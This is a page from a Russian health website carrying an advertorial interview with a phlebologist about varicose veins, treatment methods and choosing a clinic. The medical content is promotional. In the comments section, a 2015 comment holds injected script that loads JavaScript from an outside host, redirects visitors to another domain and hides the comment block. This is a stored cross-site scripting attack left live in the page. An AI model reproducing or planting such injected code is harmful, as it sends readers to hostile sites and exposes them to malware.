Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как лечат варикоз в Росси...  >>  Как лечат варикоз в России
 
Обратная связь
 

Как лечат варикоз в России

Размер шрифта
20 февраля 2012 00:00
  • google_analytics: false
  • Нравится

Варикоз часто называют болезнью цивилизации: чем больше времени современный человек проводит за компьютером или в кресле автомобиля, тем больше шансов столкнуться с этой неприятной болезнью вен. Какое место на флебологической карте мира занимает Россия? Насколько развито здесь лечение варикозной болезни? Об этом мы поговорили с Александром Ивановичем Чернооковым – хирургом-флебологом, профессором, доктором медицинских наук, заведующим хирургическим отделением и руководителем научного отдела клиники «Центр Флебологии».

Варикоз

Александр Иванович, насколько актуальна проблема варикоза для нашей страны?

К сожалению, очень актуальна. Варикозная болезнь имеет неоднородное распространение в мире. Например, очень низкая заболеваемость варикозом отмечается в странах Африки и в Монголии (меньше 0,1%). А вот в экономически развитых странах ситуация совсем другая, в среднем здесь от варикозной болезни страдает 30-40% населения. Россия по этому показателю тоже оказывается среди лидеров, здесь отмечается степень распространенности заболеваний вен на уровне США, Франции, Великобритании. По оценкам специалистов, всего в нашей стране примерно 38 млн человек страдают варикозом, причем у каждого четвертого – осложненная форма заболевания. Около двух 2 млн человек в России инвалиды из-за варикозной болезни, а от тромботических осложнений, связанных с варикозом, каждый год умирает 5-6 тыс. человек.

Можно ли вылечить варикоз?

Методик много, но принцип лечения варикозной болезни один. В основе заболевания застой крови в поверхностных венах, из-за него давление на стенки сосудов увеличивается. Как следствие вены расширяются, и это, в свою очередь, способствует застою крови. Главная задача хирурга – устранить этот застой, расширяющий сосуды. Растянувшуюся вену уже нельзя обратно сузить, поэтому необходимо просто «выключить» больные вены из патологического кровообращения. Сделать это можно несколькими способами:

  • склеить, применив склеротерапию;
  • удалить хирургическим путем;
  • «заварить», обработав изнутри лазером или радиочастотным излучением.

Оставшиеся вены будут функционировать полноценно, а застой крови будет ликвидирован.

Александр Иванович Чернооков

Чернооков Александр Иванович профессор, доктор медицинских наук, заведующий кафедрой госпитальной хирургии №2 Московской медицинской академии им И.М. Сеченова, заведующий хирургическим отделением, руководитель научного отдела клиники Центр Флебологии.

Если больные вены убрать, не увеличит ли это нагрузку на здоровые вены?

Нет. Примерно 95% крови оттекает по глубоким венам, поэтому удаление или закрытие поверхностных вен не нарушает кровообращения, а только улучшает его. А вот не лечить больные вены действительно опасно: когда образуется застой крови, болезнь неизбежно прогрессирует. К тому же застой крови может приводить к образованию тромбов, воспалений, трофических расстройств. Вот почему чем раньше начать лечение, тем лучше будет результат.

Вернемся к методам лечения. Какая между ними разница?

Начнем с того, что они были разработаны в разное время. Например, хирургические операции на венах начали делать очень давно. Есть сведения, что их выполняли еще за несколько тысячелетий до нашей эры.

Методика склеропатии была разработана еще в середине XIX века, однако бурно это направление начало развиваться лишь с конца 1980-х годов, когда были разработаны качественные и безопасные склерозанты (специальные вещества, склеивающие стенки вены).

В последние годы появились новые методики склеротерапии:

  • микропенная склеротерапия;
  • эхо-контролируемая склеротерапия.

Эти методики еще более эффективны, кроме того, сфера их применения шире: часть больных, которых раньше приходилось оперировать, теперь можно лечить с помощью этих методов.

Еще один мощный толчок к развитию флебология получила в конце 1990-х годов, когда в практику вошли эндовазальные (внутрисосудистые) методы лечения: лазерная коагуляция, радиочастотная облитерация. Такие операции выполняются в амбулаторных условиях, под местной анестезией. После подобной процедуры пациент встает и идет домой, то есть он начинает ходить сразу после операции, и его трудоспособность никак не нарушается.

Какой из методов лечения лучше?

У каждого метода есть свои достоинства и недостатки, свои показания к применению. Вот, например, сейчас на международных флебологических конференциях активнее всего обсуждается применение лазерных и радиочастотных методов при лечении варикоза. Это новейшие методики, поэтому понятно, что они вызывают большой энтузиазм. Некоторые врачи и вовсе делают их на потоке всем подряд, однако это неправильно, ведь каждый метод имеет свои ограничения. Дело в том, что варикозная болезнь имеет большое разнообразие клинических форм, поэтому при выборе индивидуальной стратегии лечения важно учитывать и характер поражения, и его особенности, и состояние сосудов.

Мы выступаем за дифференцированный подход: в современной флебологической клинике должны работать опытные врачи, а в их распоряжении должна быть качественная УЗИ-диагностика и большой арсенал методик, чтобы для каждого конкретного пациента подобрать оптимальную стратегию лечения.

Очень эффективно бывает сочетание нескольких методов, например, сочетание операции и послеоперационной склеротерапии. Опыт показывает, что такой комплексный подход дает очень хорошие результаты.

Сейчас много фирм и медицинских центров берутся лечить варикозную болезнь. Как сориентироваться в этом море рекламы?

Надо учитывать, что возможности многих подобных клиник ограничены. Пациенту нужно обращать внимание на спектр медицинских услуг, предлагаемых клиникой. Если там делается только склеротерапия или только лечение лазером, это должно насторожить. В хорошей флебологической клинике должны применятся все современные методы лечения. Нужно следить за тем, чтобы все операции проводились только опытными врачами.

Чем шире набор методик, которыми владеет врач, тем лучше. Также следует обращать внимание на стаж работы этой клиники: если она работает год или два, то лучше с ней не связываться; желательно, чтобы клиника работала не меньше 10 лет. Безусловно, важно выяснить, заключается ли с пациентом договор, предусматривающий диспансерное наблюдение после курса лечения. Договор подразумевает, что клиника оказывает пациенту определенные медицинские услуги и несет ответственность за качество их выполнения. Ну и последний совет: обязательно посмотрите отзывы пациентов о данной клинике. Рекомендации тех, кто уже успешно прошел курс лечения, гораздо объективнее рекламных буклетов.

 

 

Имеются противопоказания,
необходима консультация специалиста

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.